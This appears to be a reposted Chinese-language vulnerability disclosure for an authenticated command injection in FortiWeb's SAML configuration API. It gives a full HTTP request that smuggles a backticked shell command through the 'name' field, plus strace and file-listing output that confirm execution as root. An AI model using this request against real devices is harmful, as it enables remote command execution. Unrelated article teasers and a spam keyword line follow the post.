<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    0day Fortinet FortiWeb OS 命令注入

    007bug2021-08-21 11:32:04


           FortiWeb 管理界面(版本 6.3.11 及更早版本)中的操作系統命令注入漏洞可允許遠程、經過身份驗證的攻擊者通過 SAML 服務器配置頁面在系統上執行任意命令。

    POC:

    POST /api/v2.0/user/remoteserver.saml HTTP/1.1
    Host: [redacted]
    Cookie: [redacted]
    User-Agent: [redacted]
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://[redacted]/root/user/remote-user/saml-user/
    X-Csrftoken: 814940160
    Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412
    Content-Length: 3068
    Origin: https://[redacted]
    Dnt: 1
    Te: trailers
    Connection: close
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="q_type"
    1
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="name"
    `touch /tmp/vulnerable`
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="entityID"
    test
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="service-path"
    /saml.sso
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="session-lifetime"
    8
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="session-timeout"
    30
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="sso-bind"
    post
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="sso-bind_val"
    1
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="sso-path"
    /SAML2/POST
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="slo-bind"
    post
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="slo-bind_val"
    1
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="slo-path"
    /SLO/POST
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="flag"
    0
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="enforce-signing"
    disable
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="enforce-signing_val"
    0
    -----------------------------94351131111899571381631694412
    Content-Disposition: form-data; name="metafile"; filename="test.xml"
    Content-Type: text/xml
    "1.0"
    ?>
    test
    test
    urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified
    -----------------------------94351131111899571381631694412--
    HTTP/1.1 500 Internal Server Error
    Date: Thu, 10 Jun 2021 11:59:45 GMT
    Cache-Control: no-cache, no-store, must-revalidate
    Pragma: no-cache
    Set-Cookie: [redacted]
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Content-Security-Policy: frame-ancestors 'self'
    X-Content-Type-Options: nosniff
    Content-Length: 20
    Strict-Transport-Security: max-age=63072000
    Connection: close
    Content-Type: application/json
    {"errcode": "-651"}
    

    “touch”命令連接在 mkdir shell 命令中:

    [pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0
    [pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0
    [pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0
    [pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0
    

    在 FortiWeb 設備的本地命令行上看到“touch”命令的結果:

    /# ls -l /tmp/vulnerable-rw-r--r--    1 root     0                0 Jun 10 11:59 /tmp/vulnerable/#
    
    fortinetform
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0day Fortinet FortiWeb OS 命令注入
    Adobe已發布修復程序,以解決其流行的Experience Manager內容管理解決方案中用于構建網站,移動應用程序和表單的五個關鍵漏洞。跨站點腳本(XSS)漏洞可能使攻擊者能夠在目標瀏覽器中執行JavaScript。 包括Adobe Exp...
    在接下來的第二部分中,AdvIntel將對BlackCat的組織結構、招聘和運營過程進行分析。這反過來使得網絡防御組織將Cobalt Strike的攻陷標志作為確鑿的告警信號,增加了罪犯被發現的機會,并最終降低了他們攻擊的持久性。不過,BlackCat的情況與主流敘事有所不同,因為該組織已經圍繞自己編寫的攻擊性腳本建立了一套行動方案。這使BlackCat領先于其競爭對手。
    WAF指紋識別工具
    2022-04-11 06:18:47
    原理發送正常的 HTTP 請求并分析響應;這確定了許多 WAF 解決方案。如果不成功,則發送多個HTTP 請求,并使用簡單的邏輯來示例就是WAF。
    新冠疫情所致遠程辦公和云端遷移的大潮,為網絡罪犯開辟了新的途徑。2021年,在遠程工作狀態影響下,世界各地的網絡攻擊急劇上升,勒索軟件、網絡釣魚、人為錯誤操作等導致的數據泄露不斷增加,全球范圍內網絡威脅依舊不斷。特別是勒索軟件的高度猖獗,在上半年的攻擊次數已達到3.047億,同比增長達151%,遠超2020年全年攻擊總數,對多國家、多行業、多領域造成不同程度的影響。
    發送正常的 HTTP 請求并分析響應;這確定了許多 WAF 解決方案
    報告顯示,2021上半年全球威脅態勢保持嚴峻,94%的受訪者擔心遭受勒索軟件攻擊的威脅。
    Bleeping Computer 網站消息,在 Fortinet 發布 CVE-2023-27997 漏洞補丁近一個月后,數十萬 FortiGate 防火墻易受該漏洞的影響。FortiOS 連接所有 Fortinet 網絡組件,以將其集成到供應商的 Security Fabric 平臺中的操作系統,在 6 月中旬發布的公告中,供應商警告稱該漏洞可能已被攻擊者利用。
    專注網絡與安全融合的全球網絡安全廠商Fortinet,近日宣布推出新一代自研安全芯片FortiSP5,作為Fortinet ASIC技術的最新突破,有力推動了分布式網絡邊緣安全的重大飛躍。SSL 深度檢測吞吐量高達2.5 Gbps,加速檢查加密惡意流量的同時,確保卓越網絡性能。Fortinet 始終貫徹可持續發展目標FortiSP5 行業領先的能耗和性能優勢以及搭載該加速芯片的產品,將助力企業大幅降低功耗并節省設備占地空間。
    007bug
    暫無描述
      亚洲 欧美 自拍 唯美 另类